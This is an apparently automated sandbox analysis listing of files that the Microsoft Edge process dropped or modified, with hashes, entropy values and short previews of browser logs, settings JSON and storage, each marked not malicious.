                                                                                                                                                                                                                                                                                      Preview:MANIFEST-000001.
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):375520
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.354095496289301
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:6144:wA/imBpx6WdPSxKWcHu5MURacq49QxxPnyEndBuHltBfdK5WNbsVEziP/CfXtLPz:wFdMyq49tEndBuHltBfdK5WNbsVEziPU
                                                                                                                                                                                                                                                                                      MD5:C80407C679A852610C5423F0B971C1EC
                                                                                                                                                                                                                                                                                      SHA1:96F0F8B6FAEB434D26932340F69A25AFE4D5BF90
                                                                                                                                                                                                                                                                                      SHA-256:510F8AB090A0C4F50281883CDC669919E061134B20C7BE5F0E28C2880E7532F5
                                                                                                                                                                                                                                                                                      SHA-512:1FC4AC4C5B57987AC919FD13AE3A62972F0211C84441001C2108E74FB0587BC4670406785FFE990A45839D34CD3C19765F71BC3D50F9214F5E202AB8EBFFCBE3
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):16
                                                                                                                                                                                                                                                                                      Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                      MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                      SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                      SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                      SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:MANIFEST-000001.
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):317
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.15032370545021
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:6:DyAo1cNwi23oH+Tcwtk2WwnvB2KLl1yALEIq2PcNwi23oH+Tcwtk2WwnvIFUv:gZYebkxwnvFL5EIvLZYebkxwnQFUv
                                                                                                                                                                                                                                                                                      MD5:B6E6B6892836D4D55F34BB84893B1815
                                                                                                                                                                                                                                                                                      SHA1:F54B14B05D7E86C77FFBD831A7B77C0E5500D693
                                                                                                                                                                                                                                                                                      SHA-256:349B00BF2F2677D3D6D05CFB87419AEFEB7CE076ECB62A08A1BCB6250575F710
                                                                                                                                                                                                                                                                                      SHA-512:60C64E762C0426C938ED4916049ECBF855EEA90955765B33D5EA2E69F2A0B0A18BF8D882A428827D722D3F2DF72F30FB205C4F205AB586D73D2388F5170DF820
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:2024/12/27-03:05:27.224 11c0 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtractionAssetStore.db since it was missing..2024/12/27-03:05:27.260 11c0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtractionAssetStore.db/MANIFEST-000001.
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):41
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                                                                                      MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                                                                                      SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                                                                                      SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                                                                                      SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:.|.."....leveldb.BytewiseComparator......
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:modified
                                                                                                                                                                                                                                                                                      Size (bytes):358860
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.324614072986668
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:6144:CgimBVvUrsc6rRA81b/18jyJNjfvrfM6Rz:C1gAg1zfvr
                                                                                                                                                                                                                                                                                      MD5:BC55A43764AB5B1CB8FD09FDC1DB1773
                                                                                                                                                                                                                                                                                      SHA1:44FFD30C5F7616A79E4FB9983F004F0D33F3C358
                                                                                                                                                                                                                                                                                      SHA-256:F997DB0260DDC304DDE6C529992594EB419976C294A29CB68E34F50CB0F5490A
                                                                                                                                                                                                                                                                                      SHA-512:01242B73446CFF6960A767C6ED03AF3E851913D86CD08E308003FF6A90266AFA3C9C9F7145003C46B0C8FD1378EFE94792AB995713E467B6C736ACE3CF4E4077
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):418
                                                                                                                                                                                                                                                                                      Entropy (8bit):1.8784775129881184
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:6:qTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCT:qWWWWWWWWWWWWWWWWWWWWW
                                                                                                                                                                                                                                                                                      MD5:BF097D724FDF1FCA9CF3532E86B54696
                                                                                                                                                                                                                                                                                      SHA1:4039A5DD607F9FB14018185F707944FE7BA25EF7
                                                                                                                                                                                                                                                                                      SHA-256:1B8B50A996172C16E93AC48BCB94A3592BEED51D3EF03F87585A1A5E6EC37F6B
                                                                                                                                                                                                                                                                                      SHA-512:31857C157E5B02BCA225B189843CE912A792A7098CEA580B387977B29E90A33C476DF99AD9F45AD5EB8DA1EFFD8AC3A78870988F60A32D05FA2DA8F47794FACE
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):327
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.154280272285558
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:6:DyftL1yq2PcNwi23oH+Tcwt8aPrqIFUt8WyfeTz1Zmw+WyfeTlRkwOcNwi23oH+o:5vLZYebL3FUt8A1/+C54ZYebQJ
                                                                                                                                                                                                                                                                                      MD5:51E6A4CBA8A7CA6741A13E4E9B61F46A
                                                                                                                                                                                                                                                                                      SHA1:360E8270C9876D95B48757592740C1CCD5C0431E
                                                                                                                                                                                                                                                                                      SHA-256:18F5EC3FA79640EA27AA98471C339AAFEB6044D0A6389A145595F3A379036A43
                                                                                                                                                                                                                                                                                      SHA-512:AEE1F7711C78BBD451A30F12BCE632913E7F857406DF6F5C62F75F33A925F3BEDD8E06BF353CBA51C5226A358513D9BA48E259D3DDB1E5CABABD0F1E5C706E5E
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:2024/12/27-03:05:22.273 9e4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/MANIFEST-000001.2024/12/27-03:05:22.274 9e4 Recovering log #3.2024/12/27-03:05:22.274 9e4 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/000003.log .
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):418
                                                                                                                                                                                                                                                                                      Entropy (8bit):1.8784775129881184
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:6:qTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCT:qWWWWWWWWWWWWWWWWWWWWW
                                                                                                                                                                                                                                                                                      MD5:BF097D724FDF1FCA9CF3532E86B54696
                                                                                                                                                                                                                                                                                      SHA1:4039A5DD607F9FB14018185F707944FE7BA25EF7
                                                                                                                                                                                                                                                                                      SHA-256:1B8B50A996172C16E93AC48BCB94A3592BEED51D3EF03F87585A1A5E6EC37F6B
                                                                                                                                                                                                                                                                                      SHA-512:31857C157E5B02BCA225B189843CE912A792A7098CEA580B387977B29E90A33C476DF99AD9F45AD5EB8DA1EFFD8AC3A78870988F60A32D05FA2DA8F47794FACE
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):331
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.173126904590315
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:6:DyfY71yq2PcNwi23oH+Tcwt865IFUt8Wyf7F1Zmw+Wyf2vTRkwOcNwi23oH+Tcwx:H74vLZYeb/WFUt8X1/+YN54ZYeb/+SJ
                                                                                                                                                                                                                                                                                      MD5:DC8C2D9F09A78BF9E24DB5410A2BFF2F
                                                                                                                                                                                                                                                                                      SHA1:51676613C896C7E7180A9877824C33917C2B8F5D
                                                                                                                                                                                                                                                                                      SHA-256:638ECF4B0BB72264F18E3467FAB9DCF0082A62F734B7CB32DD311D7969BF1A58
                                                                                                                                                                                                                                                                                      SHA-512:544D865B2A81809850F2B45B7C3B1E967CDA39DBCF848BD012F6F3E120EB53EC7145161BB569ED23AF2BDC187C1118643E1261FB554223B0F101D195891E414E
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:2024/12/27-03:05:22.298 9e4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/MANIFEST-000001.2024/12/27-03:05:22.299 9e4 Recovering log #3.2024/12/27-03:05:22.300 9e4 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/000003.log .
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):1254
                                                                                                                                                                                                                                                                                      Entropy (8bit):1.8784775129881184
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:12:qWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWA:
                                                                                                                                                                                                                                                                                      MD5:826B4C0003ABB7604485322423C5212A
                                                                                                                                                                                                                                                                                      SHA1:6B8EF07391CD0301C58BB06E8DEDCA502D59BCB4
                                                                                                                                                                                                                                                                                      SHA-256:C56783C3A6F28D9F7043D2FB31B8A956369F25E6CE6441EB7C03480334341A63
                                                                                                                                                                                                                                                                                      SHA-512:0474165157921EA84062102743EE5A6AFE500F1F87DE2E87DBFE36C32CFE2636A0AE43D8946342740A843D5C2502EA4932623C609B930FE8511FE7356D4BAA9C
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):330
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.174686493157121
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:6:DyfOVUW9yq2PcNwi23oH+Tcwt8NIFUt8WyfOSus1Zmw+WyfOHUW9RkwOcNwi23oN:bbAvLZYebpFUt8ASus1/+AHp754ZYeb2
                                                                                                                                                                                                                                                                                      MD5:8C054CA83B5A9A76E1F07226408FBBD9
                                                                                                                                                                                                                                                                                      SHA1:390ECACFC2B74AAE8F526D9B16038D9C56BB5EF2
                                                                                                                                                                                                                                                                                      SHA-256:67A1C434656CC20F724F8040E42C3D1A9FC08AFDEB2D5500AF450F14151DD7DA
                                                                                                                                                                                                                                                                                      SHA-512:0C1CE1E442A113A5CABD09326F58746608B2AA7267229139064F8432EF50F49D6714B359C2A42927BC673DE949901E499919E2C241E6736E4D853E41037A5D47
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:2024/12/27-03:05:22.962 12c0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/MANIFEST-000001.2024/12/27-03:05:22.967 12c0 Recovering log #3.2024/12/27-03:05:22.968 12c0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/000003.log .
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):429
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.809210454117189
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:6:Y8U0vEjrAWT0VAUD9lpMXO4SrqiweVHUSENjrAWT0HQQ9/LZyVMQ3xqiweVHlrSQ:Y8U5j0pqCjJA7tNj0pHx/LZ4hcdQ
                                                                                                                                                                                                                                                                                      MD5:5D1D9020CCEFD76CA661902E0C229087
                                                                                                                                                                                                                                                                                      SHA1:DCF2AA4A1C626EC7FFD9ABD284D29B269D78FCB6
                                                                                                                                                                                                                                                                                      SHA-256:B829B0DF7E3F2391BFBA70090EB4CE2BA6A978CCD665EEBF1073849BDD4B8FB9
                                                                                                                                                                                                                                                                                      SHA-512:5F6E72720E64A7AC19F191F0179992745D5136D41DCDC13C5C3C2E35A71EB227570BD47C7B376658EF670B75929ABEEBD8EF470D1E24B595A11D320EC1479E3C
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:{"file_hashes":[{"block_hashes":["OdZL4YFLwCTKbdslekC6/+U9KTtDUk+T+nnpVOeRzUc=","6RbL+qKART8FehO4s7U0u67iEI8/jaN+8Kg3kII+uy4=","CuN6+RcZAysZCfrzCZ8KdWDkQqyaIstSrcmsZ/c2MVs="],"block_size":4096,"path":"content.js"},{"block_hashes":["OdZL4YFLwCTKbdslekC6/+U9KTtDUk+T+nnpVOeRzUc=","UL53sQ5hOhAmII/Yx6muXikzahxM+k5gEmVOh7xJ3Rw=","u6MdmVNzBUfDzMwv2LEJ6pXR8k0nnvpYRwOL8aApwP8="],"block_size":4096,"path":"content_new.js"}],"version":2}
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (1597), with CRLF line terminators
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):115717
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.183660917461099
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:1536:utDURN77GZqW3v6PD/469IxVBmB22q7LRks3swn0:utAaE2Jt0
                                                                                                                                                                                                                                                                                      MD5:3D8183370B5E2A9D11D43EBEF474B305
                                                                                                                                                                                                                                                                                      SHA1:155AB0A46E019E834FA556F3D818399BFF02162B
                                                                                                                                                                                                                                                                                      SHA-256:6A30BADAD93601FC8987B8239D8907BCBE65E8F1993E4D045D91A77338A2A5B4
                                                                                                                                                                                                                                                                                      SHA-512:B7AD04F10CD5DE147BDBBE2D642B18E9ECB2D39851BE1286FDC65FF83985EA30278C95263C98999B6D94683AE1DB86436877C30A40992ACA1743097A2526FE81
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:{.. "current_locale": "en-GB",.. "hub_apps": [ {.. "auto_show": {.. "enabled": true,.. "fre_notification": {.. "enabled": true,.. "header": "Was opening this pane helpful to you?",.. "show_count": 2,.. "text": "Was opening this pane helpful to you?".. },.. "settings_description": "We'll automatically open Bing Chat in the sidebar to show you relevant web experiences alongside your web content",.. "settings_title": "Automatically open Bing Chat in the sidebar",.. "triggering_configs|flight:msHubAppsMsnArticleAutoShowTriggering": [ {.. "show_count_basis": "signal",.. "signal_name": "IsMsnArticleAutoOpenFromP1P2",.. "signal_threshold": 0.5.. } ],.. "triggering_configs|flight:msUndersidePersistentChat": [ {.. "signal_name": "IsUndersidePersistentChatLink",.. "signal_threshold": 0.5.. } ],.. "triggering_co
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 12, cookie 0x3, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):49152
                                                                                                                                                                                                                                                                                      Entropy (8bit):3.648152292571476
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:384:aj9P0vTQkQerkjlxP/KbtLc7gam6IThj773pLLRKToaAu:ad8Te2mlxP/NajF7NRKcC
                                                                                                                                                                                                                                                                                      MD5:AE7AC53BAA5544A786E4199B61372056
                                                                                                                                                                                                                                                                                      SHA1:53116E52A28E2675564A17635763D735EB8977C2
                                                                                                                                                                                                                                                                                      SHA-256:365E7A2B1E71E4E94D2C02E0A6F842DABB7B9163CD84F6681B477C99FEC9B9F7
                                                                                                                                                                                                                                                                                      SHA-512:D02AB18CE7D6A0BA228409AB446802998ED5B02AE76EA9DDD41A4A87C8671463AFBA68738FC0E2C36627E367E1D44EE960844825DC6593D2F4E0EBD19347B475
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):414
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.280271906902576
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:12:XvLZYeb8rcHEZrELFUt8V/+H54ZYeb8rcHEZrEZSJ:/lYeb8nZrExg8qoYeb8nZrEZe
                                                                                                                                                                                                                                                                                      MD5:703BC408198171291E56335E666DF042
                                                                                                                                                                                                                                                                                      SHA1:E19936887B206937A2EF1E2221DE2DE1C9D4098A
                                                                                                                                                                                                                                                                                      SHA-256:99B85C060D5D3B070086C7BA60FCD4230D93E7534A690F1DBCC71EEBBBF61CA7
                                                                                                                                                                                                                                                                                      SHA-512:C8AA45E376BFC9DA0092529E8E133E34BE9D5D24C3CCD6C15898072617927B55A975407CF577736DD7E5E26BBC40161EF6A5E05FAEF0592B8E5E3842F5D7BAEC
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:2024/12/27-03:05:26.959 1600 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/MANIFEST-000001.2024/12/27-03:05:26.959 1600 Recovering log #3.2024/12/27-03:05:26.960 1600 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/000003.log .
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):1344
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.588943490815639
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:24:hItZWDYUlHXlTaYvXr2oGVlBVp/QXZ7WpV03y1x4Cxq9Ilsw0hap5MyG:hItZJkTaYvb2DYXZKpV03Sx4Lyls5aA1
                                                                                                                                                                                                                                                                                      MD5:9B31FB5C9E7EFA141AFA951E43C92909
                                                                                                                                                                                                                                                                                      SHA1:63A23AB002B08FCD5FA041B7EBD6BBA752972C3B
                                                                                                                                                                                                                                                                                      SHA-256:D4E4D11CD8FD87256FC924A77BDA4CDADA1ADD2FA891C469B2FBC065B05D35E1
                                                                                                                                                                                                                                                                                      SHA-512:3FB959F6C274A4C2D55718C0EAE1A14194F7E3B3DD9C9AC1512E34EE9914BD22F425ED5334054A838359BA0505CB9CD6749EC2CDC839151B6F83361A74138804
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:....9................VERSION.1..META:https://ntp.msn.com............._https://ntp.msn.com..FallbackNavigationResult?.{"r":"edgenext-base-v1-empty. NetworkCall","ic":true,"te":871}.!_https://ntp.msn.com..LastKnownPV..1735286739499.-_https://ntp.msn.com..LastVisuallyReadyMarker..1735286740539.._https://ntp.msn.com..MUID!.309DCA2A26BF68F127E0DF4827176945.._https://ntp.msn.com..bkgdV...{"cachedVideoId":-1,"lastUpdatedTime":1735286739589,"schedule":[-1,-1,27,20,-1,24,-1],"scheduleFixed":[-1,-1,27,20,-1,24,-1],"simpleSchedule":[21,47,25,26,45,31,16]}.%_https://ntp.msn.com..clean_meta_flag..1.5_https://ntp.msn.com..enableUndersideAutoOpenFromEdge..false.7_https://ntp.msn.com..nurturing_interaction_trace_ls_id..1735286739466.&_https://ntp.msn.com..oneSvcUniTunMode..header."_https://ntp.msn.com..pageVersions..{"dhp":"20241220.456"}.*_https://ntp.msn.com..pivotSelectionSource..sticky.#_https://ntp.msn.com..selectedPivot..myFeed.5_https://ntp.msn.com..ssrBasePageCachingFeatureActive..true.#_htt
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):342
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.215161763602825
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:6:Dyf8N9+q2PcNwi23oH+Tcwt8a2jMGIFUt8WyfqSJZmw+WyfQE9VkwOcNwi23oH+k:H9+vLZYeb8EFUt8JJ/+T9V54ZYeb8bJ
                                                                                                                                                                                                                                                                                      MD5:8CD784A5F9EBDB2C83A85896304EC127
                                                                                                                                                                                                                                                                                      SHA1:E34C7247A27977AE2A7B3A9FF19CA26AE27F5056
                                                                                                                                                                                                                                                                                      SHA-256:F06AEDA3DEDC917CA5EACD0807EF0251C9D150918323730F848BEE047EEBC98E
                                                                                                                                                                                                                                                                                      SHA-512:B8CBBBCAA262D13DC2509D337322F9CF30117F7E7814BDEFF6873FFD9613641D590916E4B23A106062960C5DD86F8244A96E8D9BE897EDFFEEEAA0C533C2531B
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:2024/12/27-03:05:22.687 184c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/MANIFEST-000001.2024/12/27-03:05:22.688 184c Recovering log #3.2024/12/27-03:05:22.691 184c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/000003.log .
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):2
                                                                                                                                                                                                                                                                                      Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                      MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                      SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                      SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                      SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:[]
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):1618
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.302994819295006
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:48:YcCpWsduCvsafc7leeBRsygCgkhYhbyD0:F2vu22keBxukOhn
                                                                                                                                                                                                                                                                                      MD5:90B46E2386024DB7264E402160E5F3B4
                                                                                                                                                                                                                                                                                      SHA1:3B2E2F784405DFE32CFE038FAF9F0121224877BB
                                                                                                                                                                                                                                                                                      SHA-256:C56B810798569D26A6B771B8DED39C12F26FAC419F019BC878C6B001FBFA501D
                                                                                                                                                                                                                                                                                      SHA-512:FA97B24F01A6378FA4A2B3875E9694AC90F0C469E14675FE657DB2F6728C9C9A5D665766F97FE72F533AA89E38C0F0B700C364B85C75867AB6F0083EDD05B186
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:{"net":{"http_server_properties":{"servers":[{"anonymization":["FAAAAA4AAABodHRwOi8vbXNuLmNvbQAA",false],"server":"https://assets.msn.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343557218151956","port":443,"protocol_str":"quic"}],"anonymization":["GAAAABIAAABodHRwczovL2dvb2dsZS5jb20AAA==",false],"server":"https://clients2.google.com","supports_spdy":true},{"anonymization":["FAAAAA8AAABodHRwczovL21zbi5jb20A",false],"server":"https://assets.msn.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343557218812706","port":443,"protocol_str":"quic"}],"anonymization":["JAAAAB0AAABodHRwczovL2dvb2dsZXVzZXJjb250ZW50LmNvbQAAAA==",false],"server":"https://clients2.googleusercontent.com","supports_spdy":true},{"anonymization":["HAAAABUAAABodHRwczovL21pY3Jvc29mdC5jb20AAAA=",false],"server":"https://msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.com","supports_spdy":true},{"anonymization":["HAAAABUAAABodHRwc
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 8, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 8
                                                                                                                                                                                                                                                                                      Category:modified
                                                                                                                                                                                                                                                                                      Size (bytes):20480
                                                                                                                                                                                                                                                                                      Entropy (8bit):2.781040489370062
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:192:tT1H2Mk/tNxsn5gh48LD2crp+s8L2siyVXcf0L/ZJVb:V1H2MkPqnaK8ucroL2tyVXI0LhJVb
                                                                                                                                                                                                                                                                                      MD5:4B1138BF862C60A804F2928774740599
                                                                                                                                                                                                                                                                                      SHA1:EE80F98A009A069B69D978911DB9F0B82551B64E
                                                                                                                                                                                                                                                                                      SHA-256:0CA5C2ECC9E1B785EC662EA136DD7D1E0AFEDC2CC6F804BF10674275C5FA50B3
